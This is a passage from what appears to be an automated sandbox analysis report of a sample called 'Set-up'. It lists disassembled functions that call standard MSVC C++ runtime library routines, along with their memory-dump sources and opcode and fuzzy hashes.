                                                                                              Function 6BC25993 Relevance: 7.5, APIs: 5, Instructions: 48COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC2599A
                                                                                              • ??2@YAPAXI@Z.MSVCR100(00000014,00000028,6BC412D6,?,?,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?,?,?,?), ref: 6BC259B1
                                                                                              • ??0_Locinfo@std@@QAE@PBD@Z.MSVCP100(?,00000028,6BC412D6,?,?,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?,?,?,?), ref: 6BC259DA
                                                                                              • ?_Init@?$time_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@IAEXABV_Locinfo@2@@Z.MSVCP100(00000000,00000028,6BC412D6,?,?,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?,?,?,?), ref: 6BC259F5
                                                                                              • ??1_Locinfo@std@@QAE@XZ.MSVCP100(00000028,6BC412D6,?,?,00000000,00000000,00000014,6BC41C6C,?,00000008,6BC3961F,?,?,?,?,00000004), ref: 6BC25A0D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Locinfo@std@@$??0_??1_??2@H_prolog3Init@?$time_put@_Locinfo@2@@U?$char_traits@_V?$ostreambuf_iterator@_W@std@@@std@@@std@@
                                                                                              • String ID:
                                                                                              • API String ID: 2183399274-0
                                                                                              • Opcode ID: 3b3681877147ee331e783de5124772cb578e26d9b52c274ac25ea6752d77cca8
                                                                                              • Instruction ID: a88036075fb9a17bb8576b3067fee03eca81a0d99cd722a24be8fc4ebbf6f950
                                                                                              • Opcode Fuzzy Hash: 3b3681877147ee331e783de5124772cb578e26d9b52c274ac25ea6752d77cca8
                                                                                              • Instruction Fuzzy Hash: 30114970931614DFDB15DF6CC88266EBBB0BF80711F20815AD564AB298F7B8CB41DB80
                                                                                              Function 6BC25D3D Relevance: 7.5, APIs: 5, Instructions: 48COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC25D44
                                                                                              • ??2@YAPAXI@Z.MSVCR100(00000014,00000028,6BC3CD28,?,?,00000000,00000000,00000014,6BC3F364,?,0000000C,6BC39639,?,?,?,?), ref: 6BC25D5B
                                                                                              • ??0_Locinfo@std@@QAE@PBD@Z.MSVCP100(?,00000028,6BC3CD28,?,?,00000000,00000000,00000014,6BC3F364,?,0000000C,6BC39639,?,?,?,?), ref: 6BC25D84
                                                                                              • ?_Init@?$time_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@IAEXABV_Locinfo@2@@Z.MSVCP100(00000000,00000028,6BC3CD28,?,?,00000000,00000000,00000014,6BC3F364,?,0000000C,6BC39639,?,?,?,?), ref: 6BC25D9F
                                                                                              • ??1_Locinfo@std@@QAE@XZ.MSVCP100(00000028,6BC3CD28,?,?,00000000,00000000,00000014,6BC3F364,?,0000000C,6BC39639,?,?,?,?,?), ref: 6BC25DB7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Locinfo@std@@$??0_??1_??2@H_prolog3Init@?$time_put@_Locinfo@2@@U?$char_traits@_V?$ostreambuf_iterator@_W@std@@@std@@@std@@
                                                                                              • String ID:
                                                                                              • API String ID: 2183399274-0
                                                                                              • Opcode ID: 5a8772ba637a6c886503d1567dcd3b37d15089ce1b40a9e6c3d8a2366eb09513
                                                                                              • Instruction ID: adcaa1802b2dfdbe617c9e8473f923a7c13a9ec29f49d27a28d8367d9dec4aaa
                                                                                              • Opcode Fuzzy Hash: 5a8772ba637a6c886503d1567dcd3b37d15089ce1b40a9e6c3d8a2366eb09513
                                                                                              • Instruction Fuzzy Hash: 6B112674D21611CFCB11CF68C98569EBBB1BF80B14F504199D964AF2A8FBB88B41CB80
                                                                                              Function 6BC1CAE2 Relevance: 7.5, APIs: 5, Instructions: 46COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC1CAE9
                                                                                              • ??2@YAPAXI@Z.MSVCR100(00000020,00000028,6BC1E494,?,?,00000000,00000000,00000014,6BC3EE77,?,0000000C,6BC39639,?,?,?,?), ref: 6BC1CB00
                                                                                              • ??0_Locinfo@std@@QAE@PBD@Z.MSVCP100(?,?,?,00000004), ref: 6BC1CB2B
                                                                                              • ctype.LIBCPMT(00000000,?,?,00000004), ref: 6BC1CB44
                                                                                              • ??1_Locinfo@std@@QAE@XZ.MSVCP100(?,?,?,?,00000004), ref: 6BC1CB5C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Locinfo@std@@$??0_??1_??2@H_prolog3ctype
                                                                                              • String ID:
                                                                                              • API String ID: 66114158-0
                                                                                              • Opcode ID: 344ceba2c7fa1b0e3ee0a6888df7703576a2bded916e493c33529eac494f6893
                                                                                              • Instruction ID: 5200206ec5ab7d3f391d78befc145fa0e9c2ee8b3c5161326bc1ee5b5ac856ef
                                                                                              • Opcode Fuzzy Hash: 344ceba2c7fa1b0e3ee0a6888df7703576a2bded916e493c33529eac494f6893
                                                                                              • Instruction Fuzzy Hash: BE1161719293249BEB14CFA8C48679E7BB0AF15B15F008169F811BF281E7BC9B80DB50
                                                                                              Function 6BC1BFB5 Relevance: 7.5, APIs: 5, Instructions: 46COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC1BFBC
                                                                                              • ??2@YAPAXI@Z.MSVCR100(00000010,00000028,6BC39B30,?,?,00000000,00000000,00000014,6BC3F3CE,?,0000000C,6BC39639,?,?,?,?), ref: 6BC1BFD3
                                                                                              • ??0_Locinfo@std@@QAE@PBD@Z.MSVCP100(?,?,?,00000004), ref: 6BC1BFFE
                                                                                              • _Getcvt.MSVCP100(?,?,?,?,00000004), ref: 6BC1C014
                                                                                              • ??1_Locinfo@std@@QAE@XZ.MSVCP100(?,?,?,?,00000004), ref: 6BC1C032
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Locinfo@std@@$??0_??1_??2@GetcvtH_prolog3
                                                                                              • String ID:
                                                                                              • API String ID: 69075322-0
                                                                                              • Opcode ID: 04ccafd44b93fe700a1abbc23affb56ec8d401e2e1bc5a692889ee5b9194b531
                                                                                              • Instruction ID: 8579e0c30266fbe8df85640165ef9aaafdea15d952d237e18532bf164c92b231
                                                                                              • Opcode Fuzzy Hash: 04ccafd44b93fe700a1abbc23affb56ec8d401e2e1bc5a692889ee5b9194b531
                                                                                              • Instruction Fuzzy Hash: 7A118E359263159FEB14CFA8C58579E77B0BF11725F0085ACE865AF280E7B89B40DF80
                                                                                              Function 6BC1BD8A Relevance: 7.5, APIs: 5, Instructions: 46COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC1BD91
                                                                                              • ??2@YAPAXI@Z.MSVCR100(00000010,00000028,6BC3A3B1,?,?,00000000,00000000,00000014,6BC3EDEC,?,0000000C,6BC3962C,?,?,?,?), ref: 6BC1BDA8
                                                                                              • ??0_Locinfo@std@@QAE@PBD@Z.MSVCP100(?,?,?,00000004), ref: 6BC1BDD3
                                                                                              • _Getcvt.MSVCP100(?,?,?,?,00000004), ref: 6BC1BDE9
                                                                                              • ??1_Locinfo@std@@QAE@XZ.MSVCP100(?,?,?,?,00000004), ref: 6BC1BE07
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Locinfo@std@@$??0_??1_??2@GetcvtH_prolog3
                                                                                              • String ID:
                                                                                              • API String ID: 69075322-0
                                                                                              • Opcode ID: eca854e1b7ac591ca230827fbd81402d8ccaaef4ac607115fc411cefce1d3078
                                                                                              • Instruction ID: b636e6488bb5d7e96baef1262f7f8e98cd135a4414c7fcf91b3f4323453e9e3f
                                                                                              • Opcode Fuzzy Hash: eca854e1b7ac591ca230827fbd81402d8ccaaef4ac607115fc411cefce1d3078
                                                                                              • Instruction Fuzzy Hash: 6411AC309293248BEB14DF64C48679D7BB0AF10725F008598E961AB384E7B89700DF80
                                                                                              Function 6BC3C181 Relevance: 7.5, APIs: 5, Instructions: 46stringCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _errno$strtod
                                                                                              • String ID:
                                                                                              • API String ID: 3632641845-0
                                                                                              • Opcode ID: 887ea63a6238676835bc0d47bae2ec2dc1b327fccc294230b90ff7b9ce6c83d7
                                                                                              • Instruction ID: 62d4394bf8e70b131144ecfd17faf9e6f11af821c7a6f1a0ea17f2d8e1253a68
                                                                                              • Opcode Fuzzy Hash: 887ea63a6238676835bc0d47bae2ec2dc1b327fccc294230b90ff7b9ce6c83d7
                                                                                              • Instruction Fuzzy Hash: C701A27191062CEBCF02AF65E84999E7FB4FF4A360F1140C5E400A7160EB75DA51DB94
                                                                                              Function 6BC298E5 Relevance: 7.5, APIs: 5, Instructions: 45COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC298EC
                                                                                              • ??2@YAPAXI@Z.MSVCR100(0000001C,00000028,6BC41663,?,?,00000000,00000000,00000014,6BC41C01,?,00000008,6BC3961F,?,?,?,?), ref: 6BC29903
                                                                                              • ??0_Locinfo@std@@QAE@PBD@Z.MSVCP100(?,00000028,6BC41663,?,?,00000000,00000000,00000014,6BC41C01,?,00000008,6BC3961F,?,?,?,?), ref: 6BC2992B
                                                                                              • numpunct.LIBCPMT(00000000,00000000,00000028,6BC41663,?,?,00000000,00000000,00000014,6BC41C01,?,00000008,6BC3961F,?,?,?), ref: 6BC29941
                                                                                              • ??1_Locinfo@std@@QAE@XZ.MSVCP100(00000028,6BC41663,?,?,00000000,00000000,00000014,6BC41C01,?,00000008,6BC3961F,?,?,?,?,00000004), ref: 6BC29959
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Locinfo@std@@$??0_??1_??2@H_prolog3numpunct
                                                                                              • String ID:
                                                                                              • API String ID: 493226150-0
                                                                                              • Opcode ID: 06a71032322e3b65ef501a068ca5c7d469101b8f57e0b3b8a67b7504b54f9a2e
                                                                                              • Instruction ID: e0c66a7571b70df2d38d408f35d896d86fcb3679b489a4b65eca424825d28d83
                                                                                              • Opcode Fuzzy Hash: 06a71032322e3b65ef501a068ca5c7d469101b8f57e0b3b8a67b7504b54f9a2e
                                                                                              • Instruction Fuzzy Hash: 78018031925206ABEB04DFB4C886B9E77B06F41725F104068E468AB2D2FBFA9740CB50
                                                                                              Function 6BC29ED5 Relevance: 7.5, APIs: 5, Instructions: 45COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC29EDC
                                                                                              • ??2@YAPAXI@Z.MSVCR100(0000001C,00000028,6BC3D1E1,?,?,00000000,00000000,00000014,6BC3ED17,?,0000000C,6BC3962C,?,?,?,?), ref: 6BC29EF3
                                                                                              • ??0_Locinfo@std@@QAE@PBD@Z.MSVCP100(?,00000028,6BC3D1E1,?,?,00000000,00000000,00000014,6BC3ED17,?,0000000C,6BC3962C,?,?,?,?), ref: 6BC29F1B
                                                                                              • numpunct.LIBCPMT(00000000,00000000,00000028,6BC3D1E1,?,?,00000000,00000000,00000014,6BC3ED17,?,0000000C,6BC3962C,?,?,?), ref: 6BC29F31
                                                                                              • ??1_Locinfo@std@@QAE@XZ.MSVCP100(00000028,6BC3D1E1,?,?,00000000,00000000,00000014,6BC3ED17,?,0000000C,6BC3962C,?,?,?,?,?), ref: 6BC29F49
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Locinfo@std@@$??0_??1_??2@H_prolog3numpunct
                                                                                              • String ID:
                                                                                              • API String ID: 493226150-0
                                                                                              • Opcode ID: 06a71032322e3b65ef501a068ca5c7d469101b8f57e0b3b8a67b7504b54f9a2e
                                                                                              • Instruction ID: 7ce0e28666a54e74804c2b4d54556cd66fd014b9c7b9a10cda4981ed8f24c1e9
                                                                                              • Opcode Fuzzy Hash: 06a71032322e3b65ef501a068ca5c7d469101b8f57e0b3b8a67b7504b54f9a2e
                                                                                              • Instruction Fuzzy Hash: A4016D315252059BEB44CFA4C84579E77706F41715F1040A8E414EB2D2FBFCD740CB50
                                                                                              Function 6BC1CD83 Relevance: 7.5, APIs: 5, Instructions: 45COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _CxxThrowException.MSVCR100(6BC1174C,6BC4CA2C), ref: 6BC1CDA4
                                                                                              • ?iostream_category@std@@YAABVerror_category@1@XZ.MSVCP100(6BC1174C,6BC4CA2C), ref: 6BC1CDB1
                                                                                              • ??0exception@std@@QAE@ABQBD@Z.MSVCR100(6BC12E14), ref: 6BC1CDC6
                                                                                              • ?iostream_category@std@@YAABVerror_category@1@XZ.MSVCP100 ref: 6BC1CDE8
                                                                                              • ?iostream_category@std@@YAABVerror_category@1@XZ.MSVCP100 ref: 6BC1CDF8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ?iostream_category@std@@Verror_category@1@$??0exception@std@@ExceptionThrow
                                                                                              • String ID:
                                                                                              • API String ID: 3747888997-0
                                                                                              • Opcode ID: b1dc61f738adb29d3c20bb2caed9ed2024f602b7577200fd025592dbe3384322
                                                                                              • Instruction ID: a3ede1744d5c33514f671eb358c48cc8fdcca13c5ef4228ee7dca23912a046c1
                                                                                              • Opcode Fuzzy Hash: b1dc61f738adb29d3c20bb2caed9ed2024f602b7577200fd025592dbe3384322
                                                                                              • Instruction Fuzzy Hash: 0F0192758282189FC740EFA9C45279F7BA4AF41754F108065E816BF201FA7CCB05DB61
                                                                                              Function 6BC1C39C Relevance: 7.5, APIs: 5, Instructions: 38COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC1C3A3
                                                                                              • ??0_Locinfo@std@@QAE@PBD@Z.MSVCP100(6BC12DD8,00000038), ref: 6BC1C3C5
                                                                                                • Part of subcall function 6BC1B672: __EH_prolog3.LIBCMT ref: 6BC1B679
                                                                                                • Part of subcall function 6BC1B672: std::_Lockit::_Lockit.LIBCPMT(00000000,00000010), ref: 6BC1B686
                                                                                                • Part of subcall function 6BC1B672: ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?,00000000,00000010), ref: 6BC1B6BD
                                                                                                • Part of subcall function 6BC1B672: _CxxThrowException.MSVCR100 ref: 6BC1B6D3
                                                                                                • Part of subcall function 6BC1B672: ?_Locinfo_ctor@_Locinfo@std@@SAXPAV12@PBD@Z.MSVCP100(?,?,00000000,00000010), ref: 6BC1B6DC
                                                                                              • _Getctype.MSVCP100(?,00000038), ref: 6BC1C3CE
                                                                                                • Part of subcall function 6BC3B2D3: ___lc_handle_func.MSVCR100 ref: 6BC3B2D9
                                                                                                • Part of subcall function 6BC3B2D3: ___lc_codepage_func.MSVCR100 ref: 6BC3B2E7
                                                                                                • Part of subcall function 6BC3B2D3: _calloc_crt.MSVCR100(00000100,00000002,?,?,6BC1B87C,?), ref: 6BC3B2F7
                                                                                                • Part of subcall function 6BC3B2D3: __pctype_func.MSVCR100 ref: 6BC3B30B
                                                                                                • Part of subcall function 6BC3B2D3: memcpy.MSVCR100(?,00000000), ref: 6BC3B315
                                                                                              • ??1_Locinfo@std@@QAE@XZ.MSVCP100(00000038), ref: 6BC1C3E0
                                                                                                • Part of subcall function 6BC1B776: __EH_prolog3.LIBCMT ref: 6BC1B77D
                                                                                                • Part of subcall function 6BC1B776: ?_Locinfo_dtor@_Locinfo@std@@SAXPAV12@@Z.MSVCP100(?,00000004), ref: 6BC1B78F
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7A3
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7B2
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7C1
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7D0
                                                                                                • Part of subcall function 6BC1B776: ??1_Lockit@std@@QAE@XZ.MSVCP100(?,?,?,?,?,?,?,00000004), ref: 6BC1B7DD
                                                                                              • ?_Tidy@?$ctype@D@std@@IAEXXZ.MSVCP100(00000038), ref: 6BC1C3EE
                                                                                                • Part of subcall function 6BC1C527: free.MSVCR100 ref: 6BC1C531
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: free$Locinfo@std@@$H_prolog3$??1_$??0_??0exception@std@@D@std@@ExceptionGetctypeLocinfo_ctor@_Locinfo_dtor@_LockitLockit::_Lockit@std@@ThrowTidy@?$ctype@V12@V12@@___lc_codepage_func___lc_handle_func__pctype_func_calloc_crtmemcpystd::_
                                                                                              • String ID:
                                                                                              • API String ID: 1112794092-0
                                                                                              • Opcode ID: f12967e25bcff04440910c885da093c8d9cfd96d90f963e7eb37437620cb22d5
                                                                                              • Instruction ID: b4c848624c52e9515c9c56a60602ef49a0c6d4929985f521488ec90a3b097c33
                                                                                              • Opcode Fuzzy Hash: f12967e25bcff04440910c885da093c8d9cfd96d90f963e7eb37437620cb22d5
                                                                                              • Instruction Fuzzy Hash: CEF0AF719257148BCF05CFB4C5816DE77B0BF05250F40846AA815BF241E77CDB05DBA0
                                                                                              Function 6BC23D8A Relevance: 7.5, APIs: 5, Instructions: 24COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC23D91
                                                                                              • std::_Mutex::_Mutex.LIBCPMT(00000004), ref: 6BC23DA4
                                                                                                • Part of subcall function 6BC3BAE3: ??2@YAPAXI@Z.MSVCR100(00000018,?,6BC21266,00000004), ref: 6BC3BAEA
                                                                                                • Part of subcall function 6BC3BAE3: _Mtxinit.MSVCP100(00000000,00000018,?,6BC21266,00000004), ref: 6BC3BAF2
                                                                                              • ??2@YAPAXI@Z.MSVCR100(00000004,00000004), ref: 6BC23DAF
                                                                                              • std::locale::locale.LIBCPMT ref: 6BC23DBB
                                                                                                • Part of subcall function 6BC1BB86: std::locale::_Init.LIBCPMT(?,6BC1D2B5,?,00000000,00000000), ref: 6BC1BB8B
                                                                                                • Part of subcall function 6BC1BB86: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP100(?,6BC1D2B5,?,00000000,00000000), ref: 6BC1BB92
                                                                                                • Part of subcall function 6BC1BB86: std::locale::facet::_Incref.LIBCPMT(?,6BC1D2B5,?,00000000,00000000), ref: 6BC1BB99
                                                                                              • ?_Init@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@IAEXXZ.MSVCP100(00000004), ref: 6BC23DC9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??2@$Getgloballocale@locale@std@@H_prolog3IncrefInitInit@?$basic_streambuf@_Locimp@12@MtxinitMutexMutex::_U?$char_traits@_W@std@@@std@@std::_std::locale::_std::locale::facet::_std::locale::locale
                                                                                              • String ID:
                                                                                              • API String ID: 1423025056-0
                                                                                              • Opcode ID: af320e634d1a64d174f0ed8f4abf40b3b88f32b2b354e07a86877da27af65af0
                                                                                              • Instruction ID: 5b2d4a26761ab5289b471a3e95aca4ff953fa507704805141fbd0b143aaade42
                                                                                              • Opcode Fuzzy Hash: af320e634d1a64d174f0ed8f4abf40b3b88f32b2b354e07a86877da27af65af0
                                                                                              • Instruction Fuzzy Hash: 8AE092B5B307524ADB249BB4891231D75F0AFC0A14F50086D95969B680FF7CD740C655
                                                                                              Function 6BC24086 Relevance: 7.5, APIs: 5, Instructions: 24COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC2408D
                                                                                              • std::_Mutex::_Mutex.LIBCPMT(00000004), ref: 6BC240A0
                                                                                                • Part of subcall function 6BC3BAE3: ??2@YAPAXI@Z.MSVCR100(00000018,?,6BC21266,00000004), ref: 6BC3BAEA
                                                                                                • Part of subcall function 6BC3BAE3: _Mtxinit.MSVCP100(00000000,00000018,?,6BC21266,00000004), ref: 6BC3BAF2
                                                                                              • ??2@YAPAXI@Z.MSVCR100(00000004,00000004), ref: 6BC240AB
                                                                                              • std::locale::locale.LIBCPMT ref: 6BC240B7
                                                                                                • Part of subcall function 6BC1BB86: std::locale::_Init.LIBCPMT(?,6BC1D2B5,?,00000000,00000000), ref: 6BC1BB8B
                                                                                                • Part of subcall function 6BC1BB86: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP100(?,6BC1D2B5,?,00000000,00000000), ref: 6BC1BB92
                                                                                                • Part of subcall function 6BC1BB86: std::locale::facet::_Incref.LIBCPMT(?,6BC1D2B5,?,00000000,00000000), ref: 6BC1BB99
                                                                                              • ?_Init@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@IAEXXZ.MSVCP100(00000004), ref: 6BC240C5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??2@$Getgloballocale@locale@std@@H_prolog3IncrefInitInit@?$basic_streambuf@_Locimp@12@MtxinitMutexMutex::_U?$char_traits@_W@std@@@std@@std::_std::locale::_std::locale::facet::_std::locale::locale
                                                                                              • String ID:
                                                                                              • API String ID: 1423025056-0
                                                                                              • Opcode ID: 2280daa5f29923565ee89d4bca0c07ab4e03052a37890e0d27be06d9ba23ab69
                                                                                              • Instruction ID: c4aaca02a1d62d94682e03414113d2ee046b22ea80c71e11ae68aa99a52f43fd
                                                                                              • Opcode Fuzzy Hash: 2280daa5f29923565ee89d4bca0c07ab4e03052a37890e0d27be06d9ba23ab69
                                                                                              • Instruction Fuzzy Hash: F3E0D8B5B3075287DB289BB4891231D75F0AF80614F50042E9256DB780FF7CC740C795
                                                                                              Function 6BC168CB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 136COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ??0exception@std@@QAE@ABQBD@Z.MSVCR100 ref: 6BC1692E
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4C848), ref: 6BC16946
